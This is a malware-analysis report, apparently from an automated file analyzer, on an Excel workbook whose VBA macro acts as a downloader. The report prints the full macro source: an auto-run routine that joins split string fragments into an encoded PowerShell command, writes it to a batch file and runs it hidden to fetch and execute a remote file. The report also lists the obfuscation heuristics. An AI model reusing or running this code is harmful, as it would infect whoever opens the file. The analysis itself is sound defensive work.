Malware Insights
The sample is an Excel file containing VBA macros. The macro uses obfuscation by splitting string literals to reassemble the command 'powershell.exe -win 1 -enc JABQAHIAbwBjAE 4AYQBtAGUAIAA9ACAAIgBOAGgAdQ BlAHkAdgB6AGQA eABtAG8AagBpAG EAeQB5AGkAdQBk AGsAbgBnAG4AeQ AuAGUAeABlACIA OwAoAE4AZQB3 AC0ATwBiAGoAZQBj AHQAIABTAHkAcw B0AGUAbQAuAE4A ZQB0AC4AVwBlAG IAQwBsAGkAZQBu AHQAKQAuAEQAbw B3AG4AbABvAGEA ZABGAGkAbABlAC gAIgBoAHQAdABw ADoALwAvADEAOA AuADEAOQA1AC4 A MQA0ADMALgAxAD gAMwAvADYALwA3 AC8ASQBNAEcAXw AwADYANwA4ADUA NAAxADAAMAAwAD AAMAAxADMALgBl AHgAZQAiACwAIg AkAGUAbgB2ADoA QQBQAFAARABBAF QAQQBcACQAUABy AG8AYwBOAGEAbQ BlACIAKQA7AFMA dABhAHIAdAAtAF AAcgBvAGMAZQBz AHMAIAAoACIAJA BlAG4AdgA6AEEA UABQAEQAQQBUAE EAXAAkAFAAcgBv AGMATgBhAG0AZQ AiACkA'. This command decodes to a Base64 encoded string which, when decoded, indicates the download and execution of a file from a specific URL. The use of Shell() and obfuscated PowerShell execution points to a downloader or droppper functionality.
Heuristics 3
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2662 bytes |
SHA-256: 81040dbcb9f2800e697f58bb5d932d7620d70cb03bb03d28433f8eb2b58ad310 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_SheetBeforeRightClick(ByVal Sh As Object, ByVal Target As Range, Cancel As Boolean)
End Sub
Private Sub Workbook_SheetCalculate(ByVal Sh As Object)
End Sub
Private Sub Workbook_Activate()
On Error Resume Next
Dim i As Double
Dim batch As String
Dim call1 As String
Dim s As String
s = s + "start /MIN C:\Windo"
s = s + "ws\System32\" + "WindowsPo" + "werShell\v1.0\pow" + "ershell.exe"
s = s + " -win 1 -enc"
s = s + " "
s = s + "JABQAHIAbwBjAE"
s = s + "4AYQBtAGUAIAA9"
s = s + "ACAAIgBOAGgAdQ"
s = s + "BlAHkAdgB6AGQA"
s = s + "eABtAG8AagBpAG"
s = s + "EAeQB5AGkAdQBk"
s = s + "AGsAbgBnAG4AeQ"
s = s + "AuAGUAeABlACIA"
s = s + "OwAoAE4AZQB3AC"
s = s + "0ATwBiAGoAZQBj"
s = s + "AHQAIABTAHkAcw"
s = s + "B0AGUAbQAuAE4A"
s = s + "ZQB0AC4AVwBlAG"
s = s + "IAQwBsAGkAZQBu"
s = s + "AHQAKQAuAEQAbw"
s = s + "B3AG4AbABvAGEA"
s = s + "ZABGAGkAbABlAC"
s = s + "gAIgBoAHQAdABw"
s = s + "ADoALwAvADEAOA"
s = s + "AuADEAOQA1AC4A"
s = s + "MQA0ADMALgAxAD"
s = s + "gAMwAvADYALwA3"
s = s + "AC8ASQBNAEcAXw"
s = s + "AwADYANwA4ADUA"
s = s + "NAAxADAAMAAwAD"
s = s + "AAMAAxADMALgBl"
s = s + "AHgAZQAiACwAIg"
s = s + "AkAGUAbgB2ADoA"
s = s + "QQBQAFAARABBAF"
s = s + "QAQQBcACQAUABy"
s = s + "AG8AYwBOAGEAbQ"
s = s + "BlACIAKQA7AFMA"
s = s + "dABhAHIAdAAtAF"
s = s + "AAcgBvAGMAZQBz"
s = s + "AHMAIAAoACIAJA"
s = s + "BlAG4AdgA6AEEA"
s = s + "UABQAEQAQQBUAE"
s = s + "EAXAAkAFAAcgBv"
s = s + "AGMATgBhAG0AZQ"
s = s + "AiACkA"
ActiveWorkbook.Save
batch = "Lauzwnihixafsej.bat"
Open batch For Output As #1
Print #1, s
Close #1
i = Shell(batch, 0)
End Sub
Private Sub Cellss()
End Sub
Private Sub Workbook_SheetSelectionChange(ByVal Sh As Object, ByVal Target As Range)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Workbook"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 6656 bytes |
SHA-256: 908014540259f2e929940a154fc1e18f6e8a756f4af04db55c2bc52014ed41dd |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.